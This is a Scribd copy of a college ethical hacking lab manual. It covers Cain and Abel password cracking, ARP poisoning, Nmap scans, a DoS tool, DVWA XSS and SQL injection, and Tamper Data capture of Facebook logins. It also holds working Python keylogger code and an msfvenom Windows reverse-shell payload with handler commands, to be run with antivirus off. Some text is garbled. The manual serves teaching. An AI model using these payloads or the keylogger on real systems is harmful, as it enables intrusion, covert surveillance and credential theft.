Scribd
Upload
80 views

Ethical hacking practical

The document is a lab manual for the Ethical Hacking course at M.S. College of Science, Arts, and Commerce under Mumbai University for the academic year 2024-2025. It includes a certification section, an index of practicals covering various ethical hacking techniques, and detailed instructions for each practical exercise. Topics range from reconnaissance using Google and Whois to SQL injection, session impersonation, and creating a keylogger with Python.

Uploaded by

trendreelorvideo123
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
80 views

Ethical hacking practical

The document is a lab manual for the Ethical Hacking course at M.S. College of Science, Arts, and Commerce under Mumbai University for the academic year 2024-2025. It includes a certification section, an index of practicals covering various ethical hacking techniques, and detailed instructions for each practical exercise. Topics range from reconnaissance using Google and Whois to SQL injection, session impersonation, and creating a keylogger with Python.

Uploaded by

trendreelorvideo123
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 34

Habib Education and Welfare Society’s

M.S. COLLEGE OF SCIENCE, ARTS, COMMERCE, BSC


(IT), BSC (CS), B.COM, BMS. (DEVGHAR)

MUMBAI UNIVERSITY

ETHICAL HACKING

LAB MANUAL

(A.Y. 2024 – 2025)


|

CERTIFICATE
DEPARTMENT OF COMPUTER SCIENCE

This is to certify that Mr. / Miss.

of B.Sc. (CS) Semester VI, Roll No. has successfully completed the practical’s in

the subject of Ethical Hacking as per the requirement of University of Mumbai in part fulfillment for

the completion of Degree of Bachelor of Science (Computer Science). It is also to certify that this is the

original work of the candidate done during the academic year 2024-2025.

Internal Examiner Subject Teacher

H.O.D
DEPARTMENT OF C.S.

DATE OF SUBMISSION: COLLEGE SEAL

2
02

INDEX
SR
PRACTICAL NAME DATE SIGN
NO
.
1. Google and Whois Reconnaissance
Use Google search techniques to gather information about a specific target
or organization.
Utilize advanced search operators to refine search results and access hidden
information.
Perform Whois lookups to retrieve domain registration information and
gather details about the target's infrastructure.

2. Password Encryption and Cracking with CrypTool and Cain and Abel
Password Encryption and Decryption:
o Use CrypTool to encrypt passwords using the RC4 algorithm.
o Decrypt the encrypted passwords and verify the
original values.
Password Cracking and Wireless Network Password
Decoding:
o Use Cain and Abel to perform a dictionary attack on Windows account
passwords.
o Decode wireless network passwords using Cain and
Abel's capabilities

3. Linux Network Analysis and ARP Poisoning


Linux Network Analysis:
o Execute the ifconfig command to retrieve network interface information.
o Use the ping command to test network connectivity and analyze the output.
o Analyze the netstat command output to view active network connections.
o Perform a traceroute to trace the route packets take to reach a target host.
ARP Poisoning:
o Use ARP poisoning techniques to redirect network traffic on a Windows
system.
o Analyze the effects of ARP poisoning on network communication and
security.

4. Port Scanning with NMap


Use NMap to perform an ACK scan to determine if a port is filtered,
unfiltered, or open.
Perform SYN, FIN, NULL, and XMAS scans to identify open ports and
their characteristics.
Analyze the scan results to gather information about the target system's
network services.

5. Network Traffic Capture and DoS Attack with Wireshark and Nemesy
Network Traffic Capture:
o Use Wireshark to capture network traffic on a specific network interface.
o Analyze the captured packets to extract relevant
information and

identify potential security issues.


Denial of Service (DoS) Attack:
o Use Nemesy to launch a DoS attack against a target
system or network.

1
02

o Observe the impact of the attack on the target's availability and


performance.

6. Persistent Cross-Site Scripting Attack


Set up a vulnerable web application that is susceptible to persistent XSS
attacks.
Craft a malicious script to exploit the XSS vulnerability and execute
arbitrary code.
Observe the consequences of the attack and understand the potential risks
associated with XSS vulnerabilities.
7. Session Impersonation with Firefox and Tamper Data
Install and configure the Tamper Data add-on in Firefox.
Intercept and modify HTTP requests to impersonate a user's session.
Understand the impact of session impersonation and the importance of
session management.
8. SQL Injection Attack
Identify a web application vulnerable to SQL injection.
Craft and execute SQL injection queries to exploit the vulnerability.
Extract sensitive information or manipulate the database through the SQL
injection attack.
9. Creating a Keylogger with Python
Write a Python script that captures and logs keystrokes from a target
system.
Execute the keylogger script and observe the logged keystrokes.
Understand the potential security risks associated with keyloggers and the
importance of protecting against them.

2
02

PRACTICAL NO 01
Aim: Use Google and Whois for Reconnaissance

3
02

4
02

Practical-2
Aim:
a) Use CrypTool to encrypt and decrypt passwords using RC4 algorithm
b) Use Cain and Abel for cracking Windows account password using Dictionary attack
and to decode wireless network passwords.

Steps:
1. Install CrypTool from https://www.cryptool.org/en/ct1-downloads.

2. Plain Text

3. To Encrypt Click on Encrypt/Decrypt > Symmetric(modern) > RC4

4. Click the number of bits

5. Click Encrypt.

6. To Decrypt Again click on Encrypt/Decrypt > Symmetric(modern) > RC4

7. Click the number of bits.

8. Click Decrypt.

5
02

b) Use Cain and Abel for cracking Windows account password using dictionary attack
and to decode wireless network password.

1. Open the software, click on Cracker tab >> Hash Calculator tool as shown in the image.

2. A dialogue box appears after clicking on hash calculator,


Add the text >> Calculate hash code >> Copy MD5 hash value

6
02

3. Click on MD5 Hashes>> Add list>>Paste Hash Value.

4. Click on hash code right click,Dictionary Attack>>Add to list>>Start

7
02

Match Found: Match not Found:

8
02

Practical-3
Aim: a) Run and analyze the output of following commands in Linux –
ifconfig, ping, netstat, traceroute.
b) Perform ARP Poisoning in Windows

a) Linux Commands:

1. ifconfig

2. netstat

9
02

3. ping

4. traceroute

10
02

b) ARP Poisoning
Steps:
1) Click on Sniffer tab.

2) Click on Start/Stop Sniffer and give range values and click okay.

11
02

3) Right click on any IP and select Resolve Host Name.

4) Click on ARP tab on the bottom.

5) Click on Add Button(1) and select your router and any IP.

12
02

6) Click on the IP and then click on the button shown in the image to start ARP
Poisoning.

13
02

Practical – 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN,
NULL, XMAS.

NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to
check if it is installed properly. Now type the below commands.

• ACK -sA (TCP ACK scan)


It never determines open (or even open|filtered) ports. It is used to map out firewall
rulesets, determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

• SYN (Stealth) Scan (-sS)


SYN scan is the default and most popular scan option for good reason. It can be
performed quickly, scanning thousands of ports per second on a fast network not
hampered by intrusive firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

14
02

• FIN Scan (-sF)


Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

• NULL Scan (-sN)


Does not set any bits (TCP flag header is 0)

Command: nmap –sN –p 22 scanme.nmap.org

• XMAS Scan (-sX)


Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org

15
02

Practical-5
Aim: a) Use Wireshark (Sniffer) to capture network traffic and analyze
b) Use Nemesy to launch DoS attack

a) Use Wireshark (Sniffer) to capture network traffic and analyze


Steps:

1. Open Wireshark and select your Connection.

16
02

2. Open any http website and add display filter as http.

3. Right Click on the POST method >> Follow >> TCP stream.

17
02

4. Search for ‘credentials’ in the dialog box.

18
02

Practical – 6
Aim: Simulate persistent cross-site scripting attack.

Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.

19
02

8. Click on DVWA security and set the security to low.

9. Click on XSS (Stored) write the script and click on sign guestbook. The script will be
executed whenever the page is reloaded.

20
02

21
02

Practical – 7
Aim: Session impersonation using Firefox and Tamper Data add-on.
Steps:
1. Open Firefox
2. Go to tools > Add on > Extension
3. Search and install Temper Data.
4. Go to facebook login page.
5. Now click on tamper add on and start tampering the data.
6. Now enter the username and password in the facebook login page.
7. Your username and password is been captured using session impersonation.

22
02

8. Select a website for tempering data e.g(razorba).

9. Select any item to buy


10. Then click on add-cart
11. Then click on TemperData(add-on)

23
02

12. Refresh the page to get the extension.

13. Click on OK.

24
02

14. Change values in Cookie option for tempering the DATA.

15. Then click on OK and see the Data has been Tempered.

25
02

Practical – 8
Aim: Perform SQL injection attack.
Steps:
1. Extract the DVWA zip file.
2. Copy the folder and paste it in Drive C: > xampp > htdocs
3. Rename the file as DVWA.
4. Go in the config file and rename the file as config.inc.php
5. Open chrome and search localhost/DVWA.
6. Click on create/reset database. The database will be created. Click on login.

7. Username = “Admin” and Password = “password”. Click on login.

26
02

8. Click on DVWA security and set the security to low.

9. Click on SQL Injection.


10. In User Id enter 1 and click on submit.

27
02

11. Type 1’ or tue;# and click on submit.

28
02

Practical – 9
Aim: Create a simple keylogger using python
Code:
from pynput.keyboard import Key, Listener
import logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function
logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG,
format='%(asctime)s:%(message)s:')
# This is from the library
def on_press(key):
logging.info(str(key))
# This says, listener is on
with Listener(on_press=on_press) as listener:
listener.join()

Output:

29
02

Practical – 10
Aim: Using Metasploit to exploit (Kali Linux).

Steps:
Boot kali linux in pendrive and open it in PC.
Open metasploit and type exit command to quit.
The directory will change to root@kali.
Type the following command.

1. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp


LHOST=192.168.9.191 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o
/tmp/1.exe
2. msfconsole
3. use exploit/multi/handler
4. msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
5. payload => windows/shell/reverse_tcp
6. Show options
7. msf exploit(multi/handler) > set LHOST 192.168.9.191
8. LHOST => 192.168.9.191
9. msf exploit(multi/handler) > set LPORT 31337
10. LPORT => 31337
11. msf exploit(multi/handler) > exploit

PUT THE PAYLOAD GENEREATED IN A WINDOWS PC (MAKE SURE ANTIVIRUS


IS OFF) AND RUN THE EXE FILE.

30
02

31
02

32

You might also like